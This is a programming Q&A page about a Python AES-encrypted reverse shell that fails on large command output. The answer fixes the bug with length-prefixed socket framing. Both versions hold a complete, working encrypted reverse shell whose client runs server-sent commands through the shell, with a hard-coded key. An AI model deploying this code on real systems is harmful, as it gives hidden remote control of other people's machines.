Search code examples
Tags: python, shell, aes, pycryptodome

Python cryptodome AES-CBC / subprocess large command output issues


I have the following code for a simple client/server reverse shell in python3.

It connects fine, and any command with a small output works great, such as "whoami" or listing the contents of a directory with one or two files. The issue seems to be with any command that produces a large output, e.g. listing all files in a large directory or running "ipconfig /all". This crashes the program with "ValueError: Padding is incorrect".

I'm sure it is something simple, but I am very new to this and unsure. Thank you.

client.py

from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding
import socket
import subprocess
# AES-256 key (32 bytes) and fixed 16-byte CBC IV; server.py defines the same
# values, which both sides need in order to decrypt each other's messages.
# NOTE(review): both are hard-coded constants readable by anyone with the
# source, and a fixed IV makes identical plaintexts encrypt identically.
key = b"H" * 32
IV = b"H" * 16

def encrypt(message):
    """Pad *message* to a 16-byte boundary and encrypt it with AES-CBC.

    A new cipher object is built from the module-level ``key`` and ``IV`` on
    every call.  NOTE(review): because ``IV`` is fixed, equal plaintexts
    always produce equal ciphertexts.
    """
    cbc = AES.new(key, AES.MODE_CBC, IV)
    return cbc.encrypt(Padding.pad(message, 16))

def decrypt(cipher):
    """Decrypt AES-CBC bytes *cipher* and strip the 16-byte block padding.

    Raises ValueError on malformed input, e.g. a truncated ciphertext, which
    surfaces as "Padding is incorrect".
    """
    plain_padded = AES.new(key, AES.MODE_CBC, IV).decrypt(cipher)
    return Padding.unpad(plain_padded, 16)

def connect():
    """Connect to the server and execute each command it sends.

    Each command is run through the shell and its stdout is sent back
    encrypted.  The loop ends when the server sends ``leave`` or closes the
    connection; the socket is closed on exit.

    NOTE(review): commands are still read with a single ``recv(1024)``, so a
    command whose ciphertext is larger than that (or arrives split across TCP
    segments) fails to decrypt.  Fixing this needs a framing change on both
    ends, such as a length prefix.
    """
    with socket.socket() as s:
        s.connect(('192.168.0.2', 8080))
        while True:
            data = s.recv(1024)
            if not data:  # recv() returns b"" once the server has closed
                break
            command = decrypt(data)
            # Exact match, so an ordinary command that merely contains
            # "leave" does not end the session.
            if command == b'leave':
                break
            proc = subprocess.Popen(command.decode(), shell=True,
                                    stderr=subprocess.PIPE,
                                    stdin=subprocess.PIPE,
                                    stdout=subprocess.PIPE)
            # communicate() drains stdout and stderr together and closes
            # stdin.  A chatty stderr or a command waiting on stdin therefore
            # cannot deadlock the client, and the child process is reaped.
            output, _ = proc.communicate()
            # sendall() keeps writing until every byte is sent; send() may
            # transmit only part of a large buffer.
            s.sendall(encrypt(output))
    

def main():
    """Entry point: run the client session."""
    connect()


# Only start the client when run as a script, not when imported.
if __name__ == "__main__":
    main()

server.py

import socket

from Cryptodome.Cipher import AES
from Cryptodome.Util import Padding

# Fixed 16-byte CBC IV and AES-256 key (32 bytes); client.py defines the same
# values, which both sides need in order to decrypt each other's messages.
# NOTE(review): hard-coded secrets; a fixed IV makes identical plaintexts
# encrypt identically.
IV = b"H" * 16
key = b"H" * 32

def encrypt(message):
    """Return the AES-CBC encryption of *message* after 16-byte padding.

    NOTE(review): ``key`` and ``IV`` are fixed module constants, so equal
    plaintexts always encrypt to equal ciphertexts.
    """
    block_size = 16
    padded = Padding.pad(message, block_size)
    return AES.new(key, AES.MODE_CBC, IV).encrypt(padded)

def decrypt(cipher):
    """Decrypt AES-CBC data *cipher* and remove its block padding.

    Raises ValueError on malformed input, for instance the truncated
    ciphertext that produces "Padding is incorrect".
    """
    block_size = 16
    cbc = AES.new(key, AES.MODE_CBC, IV)
    return Padding.unpad(cbc.decrypt(cipher), block_size)

def connect():
    """Accept one client and relay shell commands to it interactively.

    Typing a command containing ``leave`` sends ``b'leave'`` to the client and
    ends the session.  Both the listening and the accepted socket are closed
    on exit, including on errors.

    NOTE(review): each reply is read with a single ``recv(1024)``.  Output
    whose ciphertext exceeds 1024 bytes is truncated, which is why ``decrypt``
    fails with "Padding is incorrect".  The unread remainder also corrupts the
    next reply.  Fixing this requires length-prefixed framing on both ends.
    """
    with socket.socket() as s:
        s.bind(('192.168.0.2', 8080))
        s.listen(1)
        conn, address = s.accept()
        with conn:
            print('Connected')
            while True:
                command = input("Shell> ")
                if 'leave' in command:
                    conn.sendall(encrypt(b'leave'))
                    break
                # sendall() guarantees the whole ciphertext is written.
                conn.sendall(encrypt(command.encode()))
                print(decrypt(conn.recv(1024)).decode())
def main():
    """Entry point: run the interactive server session."""
    connect()


# Only start the server when run as a script, not when imported.
if __name__ == "__main__":
    main()

Solution

  •     print(decrypt(conn.recv(1024)).decode())
    

    The problem is that conn.recv(1024) only reads up to 1024 bytes, whereas the output of the bigger commands is probably more than 1024 bytes in size. The server therefore receives an incomplete ciphertext, and the padding check fails when it is decrypted.

    Note that a single read can also return fewer bytes than requested: TCP is a stream protocol with no message boundaries, so the receiver cannot tell on its own how many bytes belong to one message.

    A simple fix is to prefix each message with the ciphertext length. Using 4 bytes (32 bits) for the length, which allows ciphertexts of up to 2^32 - 1 bytes, a message looks like this:

    [p1,p2,p3,p4][c1,c2,c3...] where p1..p4 are the 4 prefix bytes and c1... cn are the cipher text bytes.

    So, now when we start reading a message, we first read 4 bytes, interpreting these as an integer gives us the size of the following cipher text.

    A sample implementation:

    client.py

    import socket
    import subprocess
    
    from protocol import read_msg, write_msg
    
    
    def connect():
        """Connect to the server and run each command it sends.

        Messages are exchanged with ``read_msg``/``write_msg``.  Each command
        is run through the shell and its stdout is sent back.  The session
        ends when the server sends exactly ``b'leave'``, and the socket is
        closed on exit.
        """
        with socket.socket() as s:
            s.connect(('localhost', 4040))
            while True:
                command = read_msg(s)
                print("command %s" % command)
                # Exact match, so an ordinary command that merely contains
                # "leave" (e.g. a file name) does not end the session.
                if command == b'leave':
                    break
                proc = subprocess.Popen(command.decode(), shell=True,
                                        stderr=subprocess.PIPE,
                                        stdin=subprocess.PIPE,
                                        stdout=subprocess.PIPE)
                # communicate() drains stdout and stderr together and closes
                # stdin, so neither a large stderr nor a command waiting on
                # stdin can deadlock the client; it also reaps the child.
                output, _ = proc.communicate()
                write_msg(s, output)
    
    
    def main():
        """Entry point: run the client session."""
        connect()


    # Only start the client when run as a script, not when imported.
    if __name__ == "__main__":
        main()
    

    crypto.py

    from Crypto.Util import Padding
    from Crypto.Cipher import AES
    
    # Module-level AES-256 key (32 bytes) and 16-byte CBC IV constant.
    # NOTE(review): hard-coded; anyone with this source can decrypt the
    # traffic.  Consider loading the key from configuration instead.
    key = b"H" * 32
    IV = b"H" * 16
    
    
    def encrypt(message):
        """Encrypt *message* with AES-CBC under ``key`` and a fresh random IV.

        Returns ``iv + ciphertext``.  The 16-byte IV is prepended so that
        ``decrypt`` can recover it.  A new IV per message means identical
        plaintexts no longer produce identical ciphertexts; the fixed
        module-level ``IV`` is no longer used here.

        NOTE(review): CBC gives no integrity protection; consider an
        authenticated mode such as AES-GCM.
        """
        # Omitting the iv argument makes PyCryptodome generate a random IV,
        # exposed afterwards as ``encryptor.iv``.
        encryptor = AES.new(key, AES.MODE_CBC)
        padded_message = Padding.pad(message, AES.block_size)
        return encryptor.iv + encryptor.encrypt(padded_message)


    def decrypt(cipher):
        """Reverse ``encrypt``: split off the leading IV, decrypt, then unpad.

        Raises ValueError if *cipher* is too short, not block-aligned, or has
        invalid padding (e.g. truncated or corrupted data).
        """
        iv, body = cipher[:AES.block_size], cipher[AES.block_size:]
        decryptor = AES.new(key, AES.MODE_CBC, iv)
        return Padding.unpad(decryptor.decrypt(body), AES.block_size)
    

    protocol.py

    from crypto import encrypt, decrypt
    
    
    def _recv_exactly(s, n, max_buffer_size=1024):
        """Return exactly *n* bytes read from socket *s*.

        Reads in chunks of at most *max_buffer_size* bytes and raises
        ConnectionError if the peer closes the connection first.
        """
        buf = bytearray()
        while len(buf) < n:
            # Never request more than is still missing, so bytes that belong
            # to a following message stay in the socket.
            chunk = s.recv(min(n - len(buf), max_buffer_size))
            if not chunk:  # recv() returns b"" once the peer has closed
                raise ConnectionError(
                    "connection closed after %d of %d bytes" % (len(buf), n))
            buf += chunk
        return bytes(buf)


    def read_msg(s, max_buffer_size=1024):
        """Read one length-prefixed encrypted message from *s* and decrypt it.

        Wire format: a 4-byte big-endian ciphertext length, followed by that
        many bytes of ciphertext.

        Raises ConnectionError if the connection closes mid-message.
        """
        length_buffer = _recv_exactly(s, 4, max_buffer_size)
        message_length = int.from_bytes(length_buffer, "big")
        return decrypt(_recv_exactly(s, message_length, max_buffer_size))
    
    
    def write_msg(s, message):
        """Encrypt *message* and send it on *s* as one length-prefixed frame.

        Frame layout: 4-byte big-endian ciphertext length, then the
        ciphertext.  Raises OverflowError if the length does not fit in
        4 bytes.
        """
        encrypted_message = encrypt(message)
        message_length_raw = len(encrypted_message).to_bytes(4, "big")
        # Send the same ciphertext whose length was just measured, rather
        # than encrypting a second time.  sendall() keeps writing until the
        # whole frame is out, whereas send() may write only part of it.
        s.sendall(message_length_raw + encrypted_message)
    

    server.py

    import socket
    
    from protocol import write_msg, read_msg
    
    
    def connect():
        """Accept one client on localhost:4040 and relay commands interactively.

        Each line typed at the ``Shell>`` prompt is sent with ``write_msg``
        and the client's reply is printed.  Any input containing ``leave``
        sends ``b'leave'`` to the client and ends the session.  Both sockets
        are closed on exit, including on errors.
        """
        with socket.socket() as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            s.bind(('localhost', 4040))
            s.listen(1)
            conn, address = s.accept()
            # ``with`` closes the connection even if the client disconnects
            # and read_msg/write_msg raise.
            with conn:
                print('Connected')
                while True:
                    command = input("Shell> ")
                    if 'leave' in command:
                        write_msg(conn, b'leave')
                        break
                    write_msg(conn, command.encode())
                    print(read_msg(conn).decode())
    def main():
        """Entry point: run the interactive server session."""
        connect()


    # Only start the server when run as a script, not when imported.
    if __name__ == "__main__":
        main()